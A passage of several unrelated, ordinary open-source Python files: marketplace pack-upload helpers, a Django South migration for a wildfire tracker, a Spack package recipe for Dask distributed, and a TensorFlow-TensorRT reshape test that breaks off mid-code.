bc_versions_without_text ([List[str]): List of BC versions without text.
Returns:
(str): Text for BC entry.
"""
bc_with_text_str = '\n'.join(text_of_bc_versions)
rn_file_names_without_text = [f'''{bc_version.replace('.', '_')}.md''' for
bc_version in bc_versions_without_text]
other_rn_text: str = self._get_release_notes_concat_str(release_notes_dir, rn_file_names_without_text)
if not other_rn_text:
logging.error('No RN text, although text was expected to be found for versions'
f' {rn_file_names_without_text}.')
return f'{bc_with_text_str}{other_rn_text}'
@staticmethod
def _get_release_notes_concat_str(release_notes_dir: str, rn_file_names: List[str]) -> str:
"""
Concat all RN data found in given `rn_file_names`.
Args:
release_notes_dir (str): RN dir path.
rn_file_names (List[str]): List of all RN files to concat their data.
Returns:
(str): Concat RN data
"""
concat_str: str = ''
for rn_file_name in rn_file_names:
rn_file_path = os.path.join(release_notes_dir, rn_file_name)
with open(rn_file_path, 'r') as f:
# Will make the concat string start with new line on purpose.
concat_str = f'{concat_str}\n{f.read()}'
return concat_str
@staticmethod
def _split_bc_versions_with_and_without_text(bc_versions: Dict[str, Optional[str]]) -> Tuple[List[str], List[str]]:
"""
Splits BCs to tuple of BCs text of BCs containing text, and BCs versions that do not contain BC text.
Args:
bc_versions (Dict[str, Optional[str]): BC versions mapped to text if exists.
Returns:
(Tuple[List[str], List[str]]): (text of bc versions with text, bc_versions_without_text).
"""
text_of_bc_versions_with_tests: List[str] = []
bc_versions_without_text: List[str] = []
for bc_version, bc_text in bc_versions.items():
if bc_text:
text_of_bc_versions_with_tests.append(bc_text)
else:
bc_versions_without_text.append(bc_version)
return text_of_bc_versions_with_tests, bc_versions_without_text
@staticmethod
def _breaking_changes_versions_to_text(release_notes_dir: str) -> Dict[str, Optional[str]]:
"""
Calculates every BC version in given RN dir and maps it to text if exists.
Currently, text from a BC version is calculated in the following way:
- If RN has `breakingChangesNotes` entry in its corresponding config file, then use the value of that field
as the text of the BC to be represented.
- Else, use the whole RN text as BC text.
Args:
release_notes_dir (str): RN dir path.
Returns:
(Dict[str, Optional[str]]): {dotted_version, text}.
"""
bc_version_to_text: Dict[str, Optional[str]] = dict()
# Get all config files in RN dir
rn_config_file_names = filter_dir_files_by_extension(release_notes_dir, '.json')
for file_name in rn_config_file_names:
file_data: Dict = load_json(os.path.join(release_notes_dir, file_name))
# Check if version is BC
if file_data.get('breakingChanges'):
# Processing name for easier calculations later on
processed_name: str = underscore_file_name_to_dotted_version(file_name)
bc_version_to_text[processed_name] = file_data.get('breakingChangesNotes')
return bc_version_to_text
@staticmethod
def _changelog_entry_bc_versions(predecessor_version: LooseVersion, rn_version: LooseVersion,
breaking_changes_versions: List[LooseVersion],
bc_version_to_text: Dict[str, Optional[str]]) -> Dict[str, Optional[str]]:
"""
Gets all BC versions of given changelog entry, every BC s.t predecessor_version < BC version <= rn_version.
Args:
predecessor_version (LooseVersion): Predecessor version in numeric version order.
rn_version (LooseVersion): RN version of current processed changelog entry.
breaking_changes_versions (List[LooseVersion]): List of BC versions.
bc_version_to_text (Dict[str, Optional[str]): List of all BC to text in the given RN dir.
Returns:
Dict[str, Optional[str]]: Partial list of `bc_version_to_text`, containing only relevant versions between
given versions.
"""
return {bc_ver.vstring: bc_version_to_text.get(bc_ver.vstring) for bc_ver in breaking_changes_versions if
predecessor_version < bc_ver <= rn_version}
# HELPER FUNCTIONS
def get_upload_data(packs_results_file_path: str, stage: str) -> Tuple[dict, dict, dict, dict]:
""" Loads the packs_results.json file to get the successful and failed packs together with uploaded images dicts
Args:
packs_results_file_path (str): The path to the file
stage (str): can be BucketUploadFlow.PREPARE_CONTENT_FOR_TESTING or
BucketUploadFlow.UPLOAD_PACKS_TO_MARKETPLACE_STORAGE
Returns:
dict: The successful packs dict
dict: The failed packs dict
dict : The successful private packs dict
dict: The images data dict
"""
if os.path.exists(packs_results_file_path):
packs_results_file = load_json(packs_results_file_path)
stage_data: dict = packs_results_file.get(stage, {})
successful_packs_dict = stage_data.get(BucketUploadFlow.SUCCESSFUL_PACKS, {})
failed_packs_dict = stage_data.get(BucketUploadFlow.FAILED_PACKS, {})
successful_private_packs_dict = stage_data.get(BucketUploadFlow.SUCCESSFUL_PRIVATE_PACKS, {})
images_data_dict = stage_data.get(BucketUploadFlow.IMAGES, {})
return successful_packs_dict, failed_packs_dict, successful_private_packs_dict, images_data_dict
return {}, {}, {}, {}
def store_successful_and_failed_packs_in_ci_artifacts(packs_results_file_path: str, stage: str, successful_packs: list,
failed_packs: list, updated_private_packs: list,
images_data: dict = None):
""" Write the successful and failed packs to the correct section in the packs_results.json file
Args:
packs_results_file_path (str): The path to the pack_results.json file
stage (str): can be BucketUploadFlow.PREPARE_CONTENT_FOR_TESTING or
BucketUploadFlow.UPLOAD_PACKS_TO_MARKETPLACE_STORAGE
successful_packs (list): The list of all successful packs
failed_packs (list): The list of all failed packs
updated_private_packs (list) : The list of all private packs that were updated
images_data (dict): A dict containing all images that were uploaded for each pack
"""
packs_results = load_json(packs_results_file_path)
packs_results[stage] = dict()
if failed_packs:
failed_packs_dict = {
BucketUploadFlow.FAILED_PACKS: {
pack.name: {
BucketUploadFlow.STATUS: pack.status,
BucketUploadFlow.AGGREGATED: pack.aggregation_str if pack.aggregated and pack.aggregation_str
else "False"
} for pack in failed_packs
}
}
packs_results[stage].update(failed_packs_dict)
logging.debug(f"Failed packs {failed_packs_dict}")
if successful_packs:
successful_packs_dict = {
BucketUploadFlow.SUCCESSFUL_PACKS: {
pack.name: {
BucketUploadFlow.STATUS: pack.status,
BucketUploadFlow.AGGREGATED: pack.aggregation_str if pack.aggregated and pack.aggregation_str
else "False",
BucketUploadFlow.LATEST_VERSION: pack.latest_version
} for pack in successful_packs
}
}
packs_results[stage].update(successful_packs_dict)
logging.debug(f"Successful packs {successful_packs_dict}")
if updated_private_packs:
successful_private_packs_dict: dict = {
BucketUploadFlow.SUCCESSFUL_PRIVATE_PACKS: {pack_name: {} for pack_name in updated_private_packs}
}
packs_results[stage].update(successful_private_packs_dict)
logging.debug(f"Successful private packs {successful_private_packs_dict}")
if images_data:
packs_results[stage].update({BucketUploadFlow.IMAGES: images_data})
logging.debug(f"Images data {images_data}")
if packs_results:
json_write(packs_results_file_path, packs_results)
def load_json(file_path: str) -> dict:
""" Reads and loads json file.
Args:
file_path (str): full path to json file.
Returns:
dict: loaded json file.
"""
try:
if file_path and os.path.exists(file_path):
with open(file_path, 'r') as json_file:
result = json.load(json_file)
else:
result = {}
return result
except json.decoder.JSONDecodeError:
return {}
def json_write(file_path: str, data: Union[list, dict]):
""" Writes given data to a json file
Args:
file_path: The file path
data: The data to write
"""
with open(file_path, "w") as f:
f.write(json.dumps(data, indent=4))
def init_storage_client(service_account=None):
"""Initialize google cloud storage client.
In case of local dev usage the client will be initialized with user default credentials.
Otherwise, client will be initialized from service account json that is stored in CircleCI.
Args:
service_account (str): full path to service account json.
Return:
storage.Client: initialized google cloud storage client.
"""
if service_account:
storage_client = storage.Client.from_service_account_json(service_account)
logging.info("Created gcp service account")
return storage_client
else:
# in case of local dev use, ignored the warning of non use of service account.
warnings.filterwarnings("ignore", message=google.auth._default._CLOUD_SDK_CREDENTIALS_WARNING)
credentials, project = google.auth.default()
storage_client = storage.Client(credentials=credentials, project=project)
logging.info("Created gcp private account")
return storage_client
def input_to_list(input_data, capitalize_input=False):
""" Helper function for handling input list or str from the user.
Args:
input_data (list or str): input from the user to handle.
capitalize_input (boo): whether to capitalize the input list data or not.
Returns:
list: returns the original list or list that was split by comma.
"""
input_data = input_data if input_data else []
input_data = input_data if isinstance(input_data, list) else [s for s in input_data.split(',') if s]
if capitalize_input:
return [" ".join([w.title() if w.islower() else w for w in i.split()]) for i in input_data]
else:
return input_data
def get_valid_bool(bool_input):
""" Converts and returns valid bool.
Returns:
bool: converted bool input.
"""
return bool(strtobool(bool_input)) if isinstance(bool_input, str) else bool_input
def convert_price(pack_id, price_value_input=None):
""" Converts to integer value price input. In case no price input provided, return zero as price.
Args:
pack_id (str): pack unique identifier.
price_value_input (str): price string to convert.
Returns:
int: converted to int pack price.
"""
try:
if not price_value_input:
return 0 # in case no price was supported, return 0
else:
return int(price_value_input) # otherwise convert to int and return result
except Exception:
logging.exception(f"{pack_id} pack price is not valid. The price was set to 0.")
return 0
def get_updated_server_version(current_string_version, compared_content_item, pack_name):
""" Compares two semantic server versions and returns the higher version between them.
Args:
current_string_version (str): current string version.
compared_content_item (dict): compared content item entity.
pack_name (str): the pack name (id).
Returns:
str: latest version between compared versions.
"""
lower_version_result = current_string_version
try:
compared_string_version = compared_content_item.get('fromversion') or compared_content_item.get(
'fromVersion') or "99.99.99"
current_version, compared_version = LooseVersion(current_string_version), LooseVersion(compared_string_version)
if current_version > compared_version:
lower_version_result = compared_string_version
except Exception:
content_item_name = compared_content_item.get('name') or compared_content_item.get(
'display') or compared_content_item.get('id') or compared_content_item.get('details', '')
logging.exception(f"{pack_name} failed in version comparison of content item {content_item_name}.")
finally:
return lower_version_result
def get_content_git_client(content_repo_path: str):
""" Initializes content repo client.
Args:
content_repo_path (str): content repo full path
Returns:
git.repo.base.Repo: content repo object.
"""
return git.Repo(content_repo_path)
def get_recent_commits_data(content_repo: Any, index_folder_path: str, is_bucket_upload_flow: bool,
is_private_build: bool = False, circle_branch: str = "master"):
""" Returns recent commits hashes (of head and remote master)
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path (str): the path to the local index folder
is_bucket_upload_flow (bool): indicates whether its a run of bucket upload flow or regular build
is_private_build (bool): indicates whether its a run of private build or not
circle_branch (str): CircleCi branch of current build
Returns:
str: last commit hash of head.
str: previous commit depending on the flow the script is running
"""
return content_repo.head.commit.hexsha, get_previous_commit(content_repo, index_folder_path, is_bucket_upload_flow,
is_private_build, circle_branch)
def get_previous_commit(content_repo, index_folder_path, is_bucket_upload_flow, is_private_build, circle_branch):
""" If running in bucket upload workflow we want to get the commit in the index which is the index
We've last uploaded to production bucket. Otherwise, we are in a commit workflow and the diff should be from the
head of origin/master
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path (str): the path to the local index folder
is_bucket_upload_flow (bool): indicates whether its a run of bucket upload flow or regular build
is_private_build (bool): indicates whether its a run of private build or not
circle_branch (str): CircleCi branch of current build
Returns:
str: previous commit depending on the flow the script is running
"""
if is_bucket_upload_flow:
return get_last_upload_commit_hash(content_repo, index_folder_path)
elif is_private_build:
previous_master_head_commit = content_repo.commit('origin/master~1').hexsha
logging.info(f"Using origin/master HEAD~1 commit hash {previous_master_head_commit} to diff with.")
return previous_master_head_commit
else:
if circle_branch == 'master':
head_str = "HEAD~1"
# if circle branch is master than current commit is origin/master HEAD, so we need to diff with HEAD~1
previous_master_head_commit = content_repo.commit('origin/master~1').hexsha
else:
head_str = "HEAD"
# else we are on a regular branch and the diff should be done with origin/master HEAD
previous_master_head_commit = content_repo.commit('origin/master').hexsha
logging.info(f"Using origin/master {head_str} commit hash {previous_master_head_commit} to diff with.")
return previous_master_head_commit
def get_last_upload_commit_hash(content_repo, index_folder_path):
"""
Returns the last origin/master commit hash that was uploaded to the bucket
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path: The path to the index folder
Returns:
The commit hash
"""
inner_index_json_path = os.path.join(index_folder_path, f'{GCPConfig.INDEX_NAME}.json')
if not os.path.exists(inner_index_json_path):
logging.critical(f"{GCPConfig.INDEX_NAME}.json not found in {GCPConfig.INDEX_NAME} folder")
sys.exit(1)
else:
inner_index_json_file = load_json(inner_index_json_path)
if 'commit' in inner_index_json_file:
last_upload_commit_hash = inner_index_json_file['commit']
logging.info(f"Retrieved the last commit that was uploaded to production: {last_upload_commit_hash}")
else:
logging.critical(f"No commit field in {GCPConfig.INDEX_NAME}.json, content: {str(inner_index_json_file)}")
sys.exit(1)
try:
last_upload_commit = content_repo.commit(last_upload_commit_hash).hexsha
logging.info(f"Using commit hash {last_upload_commit} from index.json to diff with.")
return last_upload_commit
except Exception as e:
logging.critical(f'Commit {last_upload_commit_hash} in {GCPConfig.INDEX_NAME}.json does not exist in content '
f'repo. Additional info:\n {e}')
sys.exit(1)
def is_ignored_pack_file(modified_file_path_parts):
""" Indicates whether a pack file needs to be ignored or not.
Args:
modified_file_path_parts: The modified file parts, e.g. if file path is "a/b/c" then the
parts list is ["a", "b", "c"]
Returns:
(bool): True if the file should be ignored, False otherwise
"""
for file_suffix in PackIgnored.ROOT_FILES:
if file_suffix in modified_file_path_parts:
return True
for pack_folder, file_suffixes in PackIgnored.NESTED_FILES.items():
if pack_folder in modified_file_path_parts:
if not file_suffixes: # Ignore all pack folder files
return True
for file_suffix in file_suffixes:
if file_suffix in modified_file_path_parts[-1]:
return True
for pack_folder in PackIgnored.NESTED_DIRS:
if pack_folder in modified_file_path_parts:
pack_folder_path = os.sep.join(modified_file_path_parts[:modified_file_path_parts.index(pack_folder) + 1])
file_path = os.sep.join(modified_file_path_parts)
for folder_path in [f for f in glob.glob(os.path.join(pack_folder_path, '*/*')) if os.path.isdir(f)]:
# Checking for all 2nd level directories. e.g. test_data directory
if file_path.startswith(folder_path):
return True
return False
def filter_dir_files_by_extension(release_notes_dir: str, extension: str) -> List[str]:
"""
Receives path to RN dir, filters only files in RN dir corresponding to the extension.
Needed because RN directory will be extended to contain JSON files for configurations,
see 'release_notes_bc_calculator.py'
Args:
release_notes_dir (str): Path to RN dir
extension (str): Extension to filter by.
Returns:
(List[str]): List of all of the files in directory corresponding to the extension.
"""
return [file_name for file_name in os.listdir(release_notes_dir) if file_name.endswith(extension)]
def is_the_only_rn_in_block(release_notes_dir: str, version: str, changelog: dict):
"""
Check if the given version is a key of an aggregated changelog block, as in its value in the changelog
doesn't contains other release notes that have been aggregated in previous uploads.
If that is the case, the adjacent previous release note in the changelog will be equal to the one in the
release notes directory, and false otherwise (meaning there are versions in the release notes directory that are
missing in the changelog, therefore they have been aggregated) and this function asserts that.
Note: The comparison is done against the release notes directory to avoid cases where there are missing versions in
the changelog due to inconsistent versions numbering, such as major version bumps. (For example, if the versions
1.2.7 and 1.3.0 are two consecutive keys in the changelog, we need to determine if 1.3.0 has aggregated the versions
1.2.8-1.3.0, OR 1.3.0 is the consecutive version right after 1.2.7 but is a major bump. in order to check that, we
check it against the files in the release notes directory.)
Args:
release_notes_dir: the path to the release notes dir.
version (str): the wanted version.
changelog (dict): the changelog from the production bucket.
Returns:
True if this version's value in the changelog is not an aggregated release notes block. False otherwise.
"""
if not changelog.get(version):
return False
all_rn_versions = []
lowest_version = [LooseVersion('1.0.0')]
for filename in filter_dir_files_by_extension(release_notes_dir, '.md'):
current_version = underscore_file_name_to_dotted_version(filename)
all_rn_versions.append(LooseVersion(current_version))
lower_versions_all_versions = [item for item in all_rn_versions if item < version] + lowest_version
lower_versions_in_changelog = [LooseVersion(item) for item in changelog.keys() if
LooseVersion(item) < version] + lowest_version
return max(lower_versions_all_versions) == max(lower_versions_in_changelog)
def underscore_file_name_to_dotted_version(file_name: str) -> str:
"""
Receives file name with expected format of x_x_x<extension>, and transforms it to dotted string.
Examples
- underscore_file_name_to_dotted_version(1_2_3.md) --> 1.2.3
- underscore_file_name_to_dotted_version(1_4_2.json) --> 1.4.2
Args:
file_name (str): File name.
Returns:
(str): Dotted version of file name
"""
return os.path.splitext(file_name)[0].replace('_', '.')
| VirusTotal/content | Tests/Marketplace/marketplace_services.py | Python | mit | 150,166 | 0.004761 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'WildfireDisplayContent.content_type'
db.add_column('calfire_tracker_wildfiredisplaycontent', 'content_type',
self.gf('django.db.models.fields.CharField')(default='Display Content', max_length=1024, null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'WildfireDisplayContent.content_type'
db.delete_column('calfire_tracker_wildfiredisplaycontent', 'content_type')
models = {
'calfire_tracker.calwildfire': {
'Meta': {'object_name': 'CalWildfire'},
'acres_burned': ('django.db.models.fields.IntegerField', [], {'max_length': '8', 'null': 'True', 'blank': 'True'}),
'administrative_unit': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'air_quality_rating': ('django.db.models.fields.IntegerField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'asset_host_image_id': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'asset_photo_credit': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'asset_url_link': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'cause': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'computed_location': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'conditions': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'containment_percent': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'cooperating_agencies': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'county_slug': ('django.db.models.fields.SlugField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'created_fire_id': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'current_situation': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'damage_assessment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'data_source': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'date_time_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'evacuations': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fire_name': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'fire_slug': ('django.db.models.fields.SlugField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'historical_narrative': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'injuries': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'null': 'True', 'blank': 'True'}),
'last_saved': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'last_scraped': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'location_geocode_error': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location_latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'location_longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'more_info': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'perimeters_image': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'phone_numbers': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'promoted_fire': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'road_closures': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'school_closures': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'structures_destroyed': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'structures_threatened': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'total_airtankers': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_dozers': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_fire_crews': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_fire_engines': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_fire_personnel': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_helicopters': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_water_tenders': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'training': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'twitter_hashtag': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'update_lockout': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'year': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfireannualreview': {
'Meta': {'object_name': 'WildfireAnnualReview'},
'acres_burned': ('django.db.models.fields.IntegerField', [], {'max_length': '8', 'null': 'True', 'blank': 'True'}),
'administrative_unit': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'data_source': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'date_range_beginning': ('django.db.models.fields.DateTimeField', [], {}),
'date_range_end': ('django.db.models.fields.DateTimeField', [], {}),
'dollar_damage': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '15', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'injuries': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'null': 'True', 'blank': 'True'}),
'jurisdiction': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'last_saved': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'number_of_fires': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'structures_destroyed': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'structures_threatened': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfiredisplaycontent': {
'Meta': {'object_name': 'WildfireDisplayContent'},
'content_headline': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'content_link': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.CharField', [], {'default': "'Display Content'", 'max_length': '1024', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_saved': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfiretweet': {
'Meta': {'object_name': 'WildfireTweet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tweet_created_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'tweet_hashtag': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_id': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_profile_image_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_screen_name': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfireupdate': {
'Meta': {'object_name': 'WildfireUpdate'},
'date_time_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'fire_name': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'calwildfire_fire_name'", 'null': 'True', 'to': "orm['calfire_tracker.CalWildfire']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'source': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'update_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['calfire_tracker'] | SCPR/firetracker | calfire_tracker/migrations/0027_auto__add_field_wildfiredisplaycontent_content_type.py | Python | gpl-2.0 | 11,098 | 0.007839 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyDistributed(PythonPackage):
"""Distributed scheduler for Dask"""
homepage = "https://distributed.dask.org/"
url = "https://pypi.io/packages/source/d/distributed/distributed-2.10.0.tar.gz"
version('2.10.0', sha256='2f8cca741a20f776929cbad3545f2df64cf60207fb21f774ef24aad6f6589e8b')
version('1.28.1', sha256='3bd83f8b7eb5938af5f2be91ccff8984630713f36f8f66097e531a63f141c48a')
depends_on('python@2.7:2.8,3.5:', when='@:1', type=('build', 'run'))
depends_on('python@3.6:', when='@2:', type=('build', 'run'))
depends_on('py-setuptools', type=('build', 'run'))
depends_on('py-click@6.6:', type=('build', 'run'))
depends_on('py-cloudpickle@0.2.2:', type=('build', 'run'))
depends_on('py-msgpack', type=('build', 'run'))
depends_on('py-psutil@5.0:', type=('build', 'run'))
depends_on('py-six', type=('build', 'run'), when='@:1')
depends_on('py-sortedcontainers@:1.999,2.0.2:', type=('build', 'run'))
depends_on('py-tblib', type=('build', 'run'))
depends_on('py-toolz@0.7.4:', type=('build', 'run'))
depends_on('py-tornado@5:', type=('build', 'run'))
depends_on('py-zict@0.1.3:', type=('build', 'run'))
depends_on('py-pyyaml', type=('build', 'run'))
depends_on('py-futures', when='@:1 ^python@2.7:2.8', type=('build', 'run'))
depends_on('py-singledispatch', when='@:1 ^python@2.7:2.8', type=('build', 'run'))
def patch(self):
filter_file('^dask .*', '', 'requirements.txt')
| rspavel/spack | var/spack/repos/builtin/packages/py-distributed/package.py | Python | lgpl-2.1 | 1,699 | 0.002943 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Basic tests for TF-TensorRT integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.tensorrt.test import tf_trt_integration_test_base as trt_test
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class ReshapeTest(trt_test.TfTrtIntegrationTestBase):
def GetParams(self):
dtype = dtypes.float32
input_name = "input"
input_dims = [100, 24, 24, 2]
output_name = "output"
g = ops.Graph()
with g.as_default():
inp = array_ops.placeholder(
dtype=dtype, shape=[None] + input_dims[1:], name=input_name)
outputs = []
# Here we test two types of reshapes, one changes the batch dimension and
# the other does not. Note that we're not able to test reshaping to
# scalar, since TRT requires input tensor to be of rank at least 2, so a
# reshape with scalar input will be filtered out of the segment before
# conversion.
with g.device("/GPU:0"):
# These reshapes happen at batch dimension, thus conversion should fail.
for shape in [[2, 50, 24, 24, 2], [-1, 50, 24, 24, 2],
[2, 50, -1, 24, 2]]:
incompatible_reshape = array_ops.reshape(inp, shape)
reshape_back = array_ops.reshape(incompatible_reshape,
[-1, 24, 24, 2])
outputs.append(self.trt_incompatible_op(reshape_back))
# Add another block with many reshapes that don't change the batch
# dimension.
compatible_reshape = array_ops.reshape(
inp, [-1, 24 * 24, 2], name="reshape-0")
compatible_reshape = array_ops.reshape(
compatible_reshape, [100, 24, -1], name="reshape-1")
compatible_reshape = array_ops.reshape(
compatible_reshape, [100, 24 * 2, 24], name="reshape-2")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 24, 24 * 2], name="reshape-3")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 6, 4, 24, 2], name="reshape-4")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 6, 4, 6, 4, 2, 1], name="reshape-5")
compatible_reshape = array_ops.reshape(
compatible_reshape, [-1, 24, 24, 2], name="reshape-6")
outputs.append(self.trt_incompatible_op(compatible_reshape))
math_ops.add_n(outputs, name=output_name)
return trt_test.TfTrtIntegrationTestParams(
gdef=g.as_graph_def(),
input_names=[input_name],
input_dims=[input_dims],
output_names=[output_name],
expected_output_dims=[tuple(input_dims)])
def ExpectedEnginesToBuild(self, run_params):
"""Return the expected engines to build."""
return {
"TRTEngineOp_0": ["reshape-%d" % i for i in range(7)] +
["reshape-%d/shape" % i for i in range(7)]
}
def ShouldRunTest(self, run_params):
"""Whether to run the test."""
return (not trt_test.IsQuantizationMode(run_params.precision_mode) and
not run_params.dynamic_engine)
class TransposeTest(trt_test.TfTrtIntegrationTestBase):
def GetParams(self):
"""Create a graph containing single segment."""
dtype = dtypes.float32
input_name = "input"
input_dims = [100, 24, 24, 2]
output_name = "output"
g = ops.Graph()
with g.as_default():
inp = array_ops.placeholder(
dtype=dtype, shape=[None] + input_dims[1:], name=input_name)
with g.device("/GPU:0"):
# Add a block with compatible transposes.
compatible_transpose = array_ops.transpose(
inp, [0, 3, 1, 2], name="transpose-1")
compatible_transpose = array_ops.transpose(
